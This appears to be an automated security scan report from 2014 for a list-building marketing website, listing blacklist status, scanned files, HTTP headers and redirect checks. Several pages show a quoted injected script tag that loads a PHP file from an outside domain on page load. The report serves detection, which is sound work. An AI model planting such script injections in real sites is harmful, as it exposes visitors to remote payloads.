Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=listbuildingtrafficgenerator.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://listbuildingtrafficgenerator.com/ | 200 OK Content-Length: 19626 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://touchdex.com.au/system_links/3EWJfFcH.php" type="text/javascript"></script> | ||
http://listbuildingtrafficgenerator.com/js/functions.js | 200 OK Content-Length: 23248 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function display_tr(check) { if (check.checked){ document.getElementById(check.name+'_td').style.display=''; }else document.getElementById(check.name+'_td').style.display='none'; } function display_tr_radio(checkName,check) { for (i=0;i<check.length;i++){ if (check[i].checked==true){ document.getElementById(checkName.name+'_'+i+'_td').style.display=''; }else{ document.getElementById(checkName.name+'_'+i+'_td').style.display='none' Antivirus reports:
| ||
http://listbuildingtrafficgenerator.com/media/video/flowplayer-3.1.4.min.js | 200 OK Content-Length: 22307 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function g(o){console.log("$f.fireEvent",[].slice.call(o))}function k(q){if(!q||typeof q!="object"){return q}var o=new q.constructor();for(var p in q){if(q.hasOwnProperty(p)){o[p]=k(q[p])}}return o}function m(t,q){if(!t){return}var o,p=0,r=t.length;if(r===undefined){for(o in t){if(q.call(t[o],o,t[o])===false){break}}}else{for(var s=t[0];p<r&&q.call(s,p,s)!==false;s=t[++p]){}}return t}function c(o){return document.getElementById(o)}function i(q,p,o){if(typeof p!="object"){r Antivirus reports:
| ||
http://listbuildingtrafficgenerator.com/js/todaysdate.js | 200 OK Content-Length: 8254 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var thisdate=new Date(); var year=thisdate.getYear(); if (year < 1000) { year+=1900; } var day=thisdate.getDay(); var month=thisdate.getMonth(); var dayx=thisdate.getDate(); if (dayx<10) { dayx="0"+dayx; } var dayarray=new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"); var montharray=new Array("January","February","March","April","May","June","July","August","September","October","November","December"); document.write(daya Antivirus reports:
| ||
http://listbuildingtrafficgenerator.com/index.php | 200 OK Content-Length: 19626 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://touchdex.com.au/system_links/3EWJfFcH.php" type="text/javascript"></script> | ||
http://listbuildingtrafficgenerator.com/signup.php | 200 OK Content-Length: 6529 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://touchdex.com.au/system_links/3EWJfFcH.php" type="text/javascript"></script> | ||
http://listbuildingtrafficgenerator.com/login.php | 200 OK Content-Length: 4920 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://touchdex.com.au/system_links/3EWJfFcH.php" type="text/javascript"></script> | ||
http://listbuildingtrafficgenerator.com/terms.php | 200 OK Content-Length: 18099 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://touchdex.com.au/system_links/3EWJfFcH.php" type="text/javascript"></script> | ||
http://listbuildingtrafficgenerator.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 30 May 2014 11:51:24 GMT Location: http://www.gogvo.com/404.html Server: Apache Content-Length: 213 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gogvo.com/404.html | HTTP/1.1 200 OK Connection: close Date: Fri, 30 May 2014 11:51:25 GMT Accept-Ranges: bytes ETag: "2bd0007-d6-4e9923a08e0c0" Server: Apache Content-Length: 214 Content-Type: text/html; charset=UTF-8 Last-Modified: Fri, 25 Oct 2013 15:15:55 GMT | clean |
http://www.joeltherien.com/go/pureleverage | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 30 May 2014 11:51:26 GMT Location: http://www.launchv.com/cashapp Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.13 | clean |
http://www.launchv.com/cashapp | HTTP/1.1 302 Found Connection: close Date: Fri, 30 May 2014 11:51:25 GMT Location: http://www.launchv.com/index.php?ref=cashapp Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.launchv.com/index.php?ref=cashapp | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 30 May 2014 11:51:26 GMT Location: http://launchv.com/?ref=cashapp Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: ref=cashapp; expires=Sun, 29-Jun-2014 11:51:26 GMT; path=/ X-Pingback: http://launchv.com/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://launchv.com/?ref=cashapp | 200 OK Content-Length: 20554 Content-Type: text/html | clean |
http://launchv.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://launchv.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://launchv.com/wp-content/themes/optimizePressTheme/lib/js/jquery/jquery.noconflict.min.js?ver=2.2.0.2 | 200 OK Content-Length: 1142 Content-Type: application/javascript | clean |
http://launchv.com/wp-content/themes/optimizePressTheme/lib/js/jquery/jquery.loadScript.min.js?ver=2.2.0.2 | 200 OK Content-Length: 301 Content-Type: application/javascript | clean |
http://launchv.com/wp-content/themes/optimizePressTheme/lib/modules/blog/video/flowplayerHTML5/flowplayer.min.js?ver=2.2.0.2 | 200 OK Content-Length: 34245 Content-Type: application/javascript | clean |
http://launchv.com/wp-content/themes/optimizePressTheme/lib/modules/blog/video/mediaelement/mediaelement-and-player.min.js?ver=2.2.0.2 | 200 OK Content-Length: 69770 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: listbuildingtrafficgenerator.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 May 2014 11:51:11 GMT
Server: Apache
Content-Length: 19626
Content-Type: text/html
Set-Cookie: cycle=MC0%3D; expires=Fri, 30-May-2014 13:51:12 GMT; path=/; domain=listbuildingtrafficgenerator.com
X-Powered-By: PHP/5.3.28
...19626 bytes of data.
GET / HTTP/1.1
Host: listbuildingtrafficgenerator.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 May 2014 11:51:11 GMT
Server: Apache
Content-Length: 19626
Content-Type: text/html
Set-Cookie: cycle=MC0%3D; expires=Fri, 30-May-2014 13:51:12 GMT; path=/; domain=listbuildingtrafficgenerator.com
X-Powered-By: PHP/5.3.28
...19626 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: listbuildingtrafficgenerator.com
Referer: http://www.google.com/search?q=listbuildingtrafficgenerator.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: listbuildingtrafficgenerator.com
Referer: http://www.google.com/search?q=listbuildingtrafficgenerator.com
Result:
The result is similar to the first query. There are no suspicious redirects found.